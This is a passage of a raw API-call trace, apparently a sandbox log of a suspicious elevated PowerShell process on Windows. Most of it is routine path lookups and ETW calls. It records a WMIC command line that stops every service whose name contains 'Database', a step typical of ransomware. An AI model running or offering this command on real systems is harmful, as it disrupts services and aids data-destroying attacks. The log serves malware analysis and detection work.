lpPerformanceCount=0x8b0edd8*=39442515250) returned 1 [0299.391] AmsiOpenSession () returned 0x0 [0299.391] AmsiScanString () returned 0x80070015 [0299.397] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=39443202019) returned 1 [0299.397] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0299.398] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.398] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x8f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.398] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.398] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.398] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.398] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.398] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="֠琉\x03") returned 0x0 [0299.399] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0299.399] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0299.399] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0299.399] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0299.400] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0299.400] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0299.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0299.400] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0299.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0299.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0299.400] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0299.400] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0299.400] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0299.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0299.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0299.401] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0299.401] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0299.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0299.401] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0299.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0299.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0299.401] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0299.401] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0299.402] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0299.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0299.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0299.402] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0299.402] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0299.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0299.402] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0299.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0299.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0299.402] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0299.402] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0299.402] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0299.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0299.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0299.403] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0299.403] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0299.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0299.403] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0299.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0299.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0299.403] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0299.403] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0299.403] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0299.404] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.404] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0299.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0299.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0299.404] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0299.405] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.405] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.405] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0299.405] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0299.406] GetConsoleWindow () returned 0x302b8 [0299.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0299.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0299.410] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0299.410] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0299.411] CoTaskMemFree (pv=0x7e29450) [0299.411] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c80b08 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice", lpProcessInformation=0x4c80b08*(hProcess=0xa28, hThread=0xa1c, dwProcessId=0xf70, dwThreadId=0x12ac)) returned 1 [0299.425] CloseHandle (hObject=0xa1c) returned 1 [0299.425] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0299.426] GetCurrentProcess () returned 0xffffffff [0299.426] GetCurrentProcess () returned 0xffffffff [0299.426] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xa28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0xa1c) returned 1 [0299.426] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0xa1c, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0302.342] CloseHandle (hObject=0xa1c) returned 1 [0302.342] GetExitCodeProcess (in: hProcess=0xa28, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0302.342] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0302.347] CloseHandle (hObject=0xa28) returned 1 [0302.348] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.348] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.348] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.348] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x96, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.348] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.349] SetEvent (hEvent=0x9d8) returned 1 [0302.349] SetEvent (hEvent=0x2ec) returned 1 [0302.349] SetEvent (hEvent=0x5d8) returned 1 [0302.349] SetEvent (hEvent=0x5dc) returned 1 [0302.349] SetEvent (hEvent=0xa4c) returned 1 [0302.349] SetEvent (hEvent=0x9e0) returned 1 [0302.349] SetEvent (hEvent=0xa14) returned 1 [0302.349] SetEvent (hEvent=0xa18) returned 1 [0302.349] SetEvent (hEvent=0xa20) returned 1 [0302.349] SetEvent (hEvent=0xa50) returned 1 [0302.350] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0302.354] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0302.355] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x147a599e, Data2=0x5ccf, Data3=0x4191, Data4=([0]=0xb8, [1]=0xa9, [2]=0xd0, [3]=0x50, [4]=0xbc, [5]=0xde, [6]=0xaa, [7]=0xa2))) returned 0x0 [0302.355] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=39739002782) returned 1 [0302.355] AmsiOpenSession () returned 0x0 [0302.355] AmsiScanString () returned 0x80070015 [0302.362] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=39739702922) returned 1 [0302.363] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0302.363] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.363] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.363] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.363] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.363] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.363] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.364] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0302.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, 